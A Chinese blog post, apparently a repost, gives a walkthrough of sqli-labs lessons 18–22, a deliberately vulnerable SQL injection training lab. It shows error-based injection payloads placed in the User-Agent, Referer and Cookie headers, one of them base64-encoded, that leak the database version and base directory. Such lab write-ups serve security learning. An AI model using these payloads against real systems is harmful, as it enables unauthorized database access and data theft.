码迷,mamicode.com
首页 > 数据库 > 详细

【20171031中】sqli-libs Less 18-22

时间:2017-10-31 20:00:29      阅读:158      评论:0      收藏:0      [点我收藏+]

标签:方式   nlb   and   sed   ges   题目   条件   png   ima   

 

 

 

 

  Less 18:

  题目:

技术分享

  分析:随便输入username和password,页面显示user agent的信息,提示我们通过修改http headers中的user-agent进行注入。

  TRY:

    工具:firefox, live http headers

    s1:打开live http headers,并重新提交,live http headers显示如下

技术分享

  s2:点击Replay...,弹出新对话框,将User-Agent内容修改为:‘and extractvalue(1, concat(0x7e,(select @@version),0x7e)) and ‘1‘=‘1,当然闭合条件和以往的测试方式一致。

技术分享

  s3:点击Repaly,重新查看网页,显示如下:暴露了系统的版本,其他信息只需要构造sql就OK了!

技术分享

 

  Less 19:

  分析这题和Less 18类似,这次要修改的是http headers中的Referer,如果你们的Live http headers中没有referer,你可以自己写一条。

  payload:‘and extractvalue(1, concat(0x7e,(select @@basedir),0x7e)) and ‘1‘=‘1

 

  Less 20:

  题目:

技术分享

  分析:cookie注入

  TRY:

    工具:Tamper Data,firefox

    s1:打开Tamper Data,开启Tamper选项,重新载入这个页面,再看Tamper内容,就变成如下:

技术分享

    s2:修改cookie值,

      payload:admin‘ and extractvalue(1, concat(0x7e,(select @@version),0x7e))#

      点击确定,再看页面

技术分享

技术分享

  Less 21:

  和Less 20类似,payload:admin‘) and extractvalue(1, concat(0x7e,(select @@version),0x7e))#,闭合方式不同,这次是 ‘)

  Less 22:

  和Less 20类似,payload是admin" and extractvalue(1, concat(0x7e,(select @@version),0x7e))#的base64加密后结果:YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSwgY29uY2F0KDB4N2UsKHNlbGVjdCBAQHZlcnNpb24pLDB4N2UpKSM=

  TRY:

  技术分享

技术分享

 

【20171031中】sqli-libs Less 18-22

标签:方式   nlb   and   sed   ges   题目   条件   png   ima   

原文地址:http://www.cnblogs.com/heijuelou/p/7763061.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!